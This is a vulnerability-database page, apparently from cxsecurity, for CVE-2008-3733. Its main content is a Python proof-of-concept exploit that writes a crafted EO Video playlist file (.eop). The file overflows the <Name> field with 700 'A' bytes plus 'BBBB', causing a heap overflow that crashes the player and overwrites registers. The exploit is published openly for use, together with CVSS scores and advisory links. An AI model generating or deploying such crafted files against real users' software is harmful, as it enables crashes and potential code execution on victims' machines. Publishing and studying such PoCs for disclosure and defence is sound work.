Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
EO Video 1.36 Local Heap Overflow DOS / PoC
2008.08.22
Credit:
j0rgan
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2008-3733
CWE:
CWE-119
CVSS Base Score:
9.3/10
Impact Subscore:
10/10
Exploitability Subscore:
8.6/10
Exploit range:
Remote
Attack complexity:
Medium
Authentication:
No required
Confidentiality impact:
Complete
Integrity impact:
Complete
Availability impact:
Complete
#!/usr/bin/python # -------------------------------------------------------------- # EO Video v1.36 Heap Overflow local PoC/DoS exploit # *.eop playlist file in <Name> buffer overflow # Other versions may be vulnerable too... # -------------------------------------------------------------- # Vulnerability discovered and coded by Muris Kurgas aka j0rgan # jorganwd [at] gmail [dot] com # -------------------------------------------------------------- # # Who uses this crap of player anyway? :) # -------------------------------------------------------------- # EAX 42424242 # EDX 42424242 # -------------------------------------------------------------- import os bafer = '\x41'* 700 + '\x42' * 4 print "Spit me out, all bright and shiny! :)" fileHandle = open ( 'plejlista.eop', 'w' ) fileHandle.write ('<EOPlaylist>\n<Playlist>\n<FolderList>\n<Folder>\n<Name>nesto</Name>\n<TrueFrequency>1</TrueFrequency>\n ') fileHandle.write ('</Folder>\n<Folder>\n<Name>nesto</Name>\n<TrueFrequency>1</TrueFrequency>\n</Folder>\n</FolderList>\n<ProjectElement>\n ') fileHandle.write ('<Name>'+bafer+'</Name>') fileHandle.write ('<StartTime>0</StartTime>\n<EndTime>0</EndTime>\n<MediaSize>\n<Width>-1</Width>\n<Height>-1</Height>\n</MediaSize>\n ') fileHandle.write ('<State>30216</State>\n<FolderPositionIndex>0</FolderPositionIndex>\n ') fileHandle.write ('</ProjectElement>\n</Playlist>\n</EOPlaylist>\n') fileHandle.close ()
References:
http://xforce.iss.net/xforce/xfdb/44508
http://www.securityfocus.com/bid/30717
http://www.milw0rm.com/exploits/6253
http://secunia.com/advisories/31511
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top